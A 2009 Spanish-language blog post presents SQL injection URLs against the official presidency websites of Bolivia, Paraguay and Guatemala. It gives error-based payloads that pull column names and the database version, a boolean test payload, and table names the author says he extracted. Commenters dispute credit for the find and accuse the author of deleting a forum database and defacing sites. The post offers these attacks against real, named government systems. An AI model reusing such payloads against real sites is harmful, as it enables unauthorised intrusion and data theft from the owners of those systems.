lunes, 16 de febrero de 2009

Bug SQL Inyection en distintas paginas de presidencias

Presidencia de bolivia:

http://www.presidencia.gob.bo/prensa/Noticias.asp?id=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=%27VIEW1%27))


Algunas tablas que saque:


1.tblFotos
2.tblnoticias
3.tblAudio
4.dtproperties
5.sysconstraints
6.syssegments
7.VIEW1


Presidencia de paraguay:

http://www.presidencia.gov.py/detalle.asp?codigo=convert(int,(@@Version))

Presidencia de guatemala:

http://www.guatemala.gob.gt/noticia.php?codigo=2074+and+1=0&tipo=1


6 comentarios:

Alandelre dijo...

groso :D

pedro dijo...

monsee

agrega
ps krackwaer
mi msn

thejhorse@msn.com

PeRdONAA

Burnice dijo...

Vulnerabilidad descubierta por vos??

Es feo hacerse el Kaker adueñandose de vulnerabilidades encontradas por otros...

http://remoteexecution.com/foro/index.php/topic,1430.msg10376.html#msg10376

Saludos ;)

krackwar dijo...

No tenia idea que habian sido descubiertas antes ;) , en todo caso no fue intencional gracias por avisar ;)

2 dias mas durara este post.

Darioxhcx dijo...

charmander (?
jajajajajjajajajjaaj (?

vine a molestar xDç
saludo no leemo

Fakedo0r dijo...

Oye hackersito , asi te llamas verda? o defacer o ke mierda ? , tirasteis la DB del foro de Antrax si ni sikiera le conocesi , venis con el nombre de "antilamers" pero borrando una DB limpia , aora kien es el lamer aki ?, donde ves la etica ahi ? , pobresito ,seve ke no sabes como sorprender ala gente y buscas alternativas tontas i retrasadas , hoy en dia para sorprender a alguien no se ace cambiando index i borrando la DB , aprende tonto. nunca seras un Hacker , seras un lamer como tus amigos...

Publicar un comentario